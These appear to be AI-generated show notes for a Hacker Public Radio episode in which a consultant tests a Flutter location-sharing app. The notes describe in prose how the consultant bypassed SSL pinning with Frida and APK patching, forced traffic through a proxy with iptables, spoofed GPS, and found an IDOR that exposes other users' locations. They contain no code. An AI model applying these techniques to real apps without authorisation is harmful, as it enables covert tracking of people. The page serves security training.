HPR4645: ZERO HOUR: FRIDAY AFTERNOON APK HACKING

This show has been flagged as Explicit by the host.

WARNING AI GENERATED NOTES AHEAD YMMW

Here is a summary of the recorded training session regarding Android hacking from Hacker Public Radio, including web references for the main topics discussed.

Overview

The recording features a security consultant performing a live assessment of an Android application. The consultant uses a custom tool suite called "Jamboree" and various other utilities to test a location-sharing and vehicle management app. The session highlights the increasing complexity of mobile app security, specifically dealing with SSL pinning, encrypted traffic, and anti-tampering mechanisms ¹ .

Environment and Tools

The assessment is conducted on a rooted Android emulator. The speaker utilizes several tools to set up the environment and intercept traffic:

• Jamboree : A custom automation tool developed by the speaker over six years to handle rooting, proxy setup, and app installation within minutes ¹ .
• Burp Suite : The primary interception proxy used to analyze traffic between the app and the production server ¹ .
• Frida : Used to bypass anti-root detection and SSL pinning ¹ .
• Ghidra : A decompiler used to analyze the app's code, specifically helpful for patching the Flutter-based application ¹ .
• Android Debug Bridge (ADB) : Used for troubleshooting, debugging, and analyzing logs ( logcat ) to extract user IDs and location data ¹ .

Technical Challenges: SSL Pinning and Flutter

The target application is built using Flutter and implements rigorous security controls, including SSL pinning, which prevents standard Man-in-the-Middle (MitM) attacks. The app's HTTP client ignores system and user-installed certificates, and it does not respect device Wi-Fi proxy settings ¹ .

To overcome this:

1. Traffic Redirection : The speaker uses iptables commands to force all HTTP and HTTPS traffic through the proxy's IP address at the network layer, bypassing the app's proxy ignorance ¹ .
2. Patching with AI : The speaker leverages AI (specifically mentioning Claude and access to "Kuro") to assist in patching the APK. The AI helped navigate Ghidra and generate Python scripts to bypass the app's protections, allowing the modified APK to trust the auditor's certificate ¹ .
3. Frida Scripts : "Frida anti-root SSL pinning" scripts are executed to further mitigate detection mechanisms ¹ .

Key Vulnerabilities Identified

1. Geolocation Spoofing

The consultant successfully spoofed the device's GPS location using emulator settings (e.g., setting the location to Puerto Rico or Costa Rica). The application accepted this falsified location data as valid, indicating a lack of server-side verification for location origin ¹ .

2. Insecure Direct Object Reference (IDOR) / Broken Access Control

The most critical finding involves the app's user tracking feature.

• The consultant discovered that the API allows querying a user's location via a user_id .
• By intercepting traffic and analyzing adb logcat logs, the consultant extracted their own user_id and the user_id of a second test account ¹ .
• While authenticated as one user, the consultant was able to send a request substituting the user_id with the target's ID. The server responded with the target's GPS coordinates. This confirms that an authenticated user can track any other user's real-time location if they possess the target's ID ¹ .
• Proof of concept was created by copying the request as a curl command to demonstrate the exploit ¹ .

3. Potential Information Disclosure

The consultant began testing a feature that allows users to add vehicles by license plate. The concern is that querying a license plate might return excessive PII (Personally Identifiable Information), such as VIN numbers or registration details, beyond what the UI strictly requires (least privilege issue) ¹ .

4. Access Control (Calendar Feature)

The consultant tested whether calendar events could be accessed by switching user_id parameters. This test resulted in a "401 Unauthorized" error, indicating that this specific endpoint had proper access control in place ¹ .

Web References and Resources

Below are references for the main tools and concepts discussed in the training:

• Hacker Public Radio : https://hackerpublicradio.org/
• Burp Suite (Web Security Testing) : https://portswigger.net/burp
• Frida (Dynamic Instrumentation Toolkit) : https://frida.re/
• Ghidra (Software Reverse Engineering) : https://ghidra-sre.org/
• Android Debug Bridge (ADB) : https://developer.android.com/tools/adb
• OWASP Mobile Top 10 : https://owasp.org/www-project-mobile-top-10/
• OWASP Testing for Insecure Direct Object References (IDOR) : https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/04-Authorization_Testing/04.1-Testing_for_Insecure_Direct_Object_References
• Flutter (UI Toolkit) : https://flutter.dev/

Provide feedback on this episode.

HPR Comments

Mastodon Comments

More Information...